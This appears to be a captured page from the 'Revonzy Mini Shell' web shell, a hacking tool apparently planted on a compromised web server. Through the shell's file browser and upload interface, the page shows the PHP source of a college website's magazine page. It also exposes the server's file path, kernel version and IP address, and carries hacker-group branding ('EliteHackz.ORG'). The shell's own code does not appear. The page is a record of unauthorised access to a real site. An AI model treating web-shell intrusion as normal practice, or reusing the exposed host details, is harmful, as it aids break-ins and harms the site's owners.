Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/newsatarabca.com/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/newsatarabca.com/college-magazine.php

<?php
require_once("admin/lib/functions.php");
	$db = new login_function();
	
?>

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
     <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
    <!-- The above 4 meta tags *must* come first in the head; any other head content must come *after* these tags -->

    <!-- Title -->
    <title></title>

    <!-- Favicon -->
    <link rel="icon" href="img/core-img/favicon.ico">

    <!-- Core Stylesheet -->
    <link rel="stylesheet" href="style.css">
	<style>
body {
  
}

@media only screen and (max-width: 600px) {
  .img {
   width:20px;
   height:20px;
  }
}
</style>
<style>
	.gallery_img1
	{
		height:100%;
		width:80% ! important;
		display:inline-table;
		padding:5px;
		border:2px solid #DFDFDF;
		margin:15px;
		cursor:pointer;
		margin:auto;
		
	}
	.gallery_img1:hover
	{
		background-color:maroon;
		
	}
		.tab_data
	{
		background:#880015;
		font-weight:bold;
		font-size:16px;
		color:white;
		border-right:1px solid black;
		text-align:center;
		font-family:'Muli', sans-serif;
		font-size:16px;
	}
	tr td
	{
		padding:10px;
		border:1px solid black;
		text-align:center;
		font-family:'Muli', sans-serif;
		font-size:16px;
		color:black !important;

	}
	th 
	{
		padding:10px;
	}
	</style>
</head>

<body>
    <!-- ##### Preloader ##### -->
    <div id="preloader">
        <i class="circle-preloader"></i>
    </div>

    <!-- ##### Header Area Start ##### -->
   <?php
	include('header.php');
   ?>
    <!-- ##### Header Area End ##### -->

    <div class="breadcumb-area bg-img" style="background-image: url(img/bg-img/breadcumb.jpg);">
        <div class="bradcumbContent">
            <h2>College Magazine</h2>
        </div>
    </div>
    <!-- ##### Breadcumb Area End ##### -->

    <!-- ##### About Us Area Start ##### -->
    <section class="about-us-area mt-50 section-padding-100">
        <div class="container">
				<table cellspacing='0' class="tab_table" style="margin:0px;width:100%" > <!-- cellspacing='0' is important, must stay -->
		<thead>
		<tr style="background:#880015; color:white !important;">
			<th width="20" class="tab_data">Sr.No</th>
			<th width="100" class="tab_data" >Title</th>
			<th width="30" class="tab_data">View</th>
		</tr>
		</thead>
		<tbody>
		<tr>
			<td>1</td>	
			<td>2018-2019</td>
			<td><a href="magzinepdf/img076.pdf" target="_blank">View</a></td>
		</tr>	
		<tr>
			<td>2</td>	
			<td>2017-2018</td>
			<td><a href="magzinepdf/Maharshi  2017-18.pdf" target="_blank">View</a></td>
		</tr>							
		<tr>
			<td>3</td>	
			<td>2016-2017</td>
			<td><a href="magzinepdf/Maharshi  2016-17.pdf" target="_blank">View</a></td>
		</tr>							
		<tr>
			<td>4</td>	
			<td>2015-2016</td>
			<td><a href="magzinepdf/Maharshi  2015-16.pdf" target="_blank">View</a></td>
		</tr>							
		<tr>
			<td>5</td>	
			<td>2014-2015</td>
			<td><a href="magzinepdf/Maharshi 2014-15.pdf" target="_blank">View</a></td>
		</tr>							
		</tbody>
	<!-- Table Body -->
	</table>
		<div class="gallery-list d-flex justify-content-between flex-wrap">
            <?php
					$menu="College Magazine";
				$report_details = $db->get_all_rti_info_by_menu($menu);
				
				if(!empty($report_details))
				{
					$counter =0;
					foreach($report_details as $record)
					{
						$id				=	$report_details[$counter][0];												
						$title			=	$report_details[$counter][1];
						$images			=	$report_details[$counter][2];
							
				
				?>
				 <div class="gallery-list d-flex justify-content-between flex-wrap" style="width:100% !important; margin:auto; text-align:center;  margin-top:10px;">
				<a href="IQAC/<?php echo $images;?>"><span style="color:green; font-size:16px; font-weight:bold"> <?php echo $counter+1; ?></span><img src="IQAC/<?php echo $images;?>" class="gallery_img1"></a>
				</div>
				<?php
				$counter++;
						}
					}
					else
					{
					?>
						<center><img src="http://accmadha.com/gallery/no-image.png" /></center>
				<?php
					}
				
				?>
		</div>

        </div>
    </section>
	<!-- All Plugins js -->
    <script src="js/plugins/plugins.js"></script>
    <!-- Active js -->
    <!-- ##### About Us Area End ##### -->

    <!-- ##### Team Area Start ##### -->
  
    <!-- ##### Footer Area Start ##### -->
    <?php
		include('footer.php');
	?>
    <!-- ##### Footer Area Start ##### -->

    <!-- ##### All Javascript Script ##### -->
	
    <!-- jQuery-2.2.4 js -->
    <script src="js/jquery/jquery-2.2.4.min.js"></script>
    <!-- Popper js -->
    <script src="js/bootstrap/popper.min.js"></script>
    <!-- Bootstrap js -->
    <script src="js/bootstrap/bootstrap.min.js"></script>
    
    <script src="js/active.js"></script>
</body>

</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4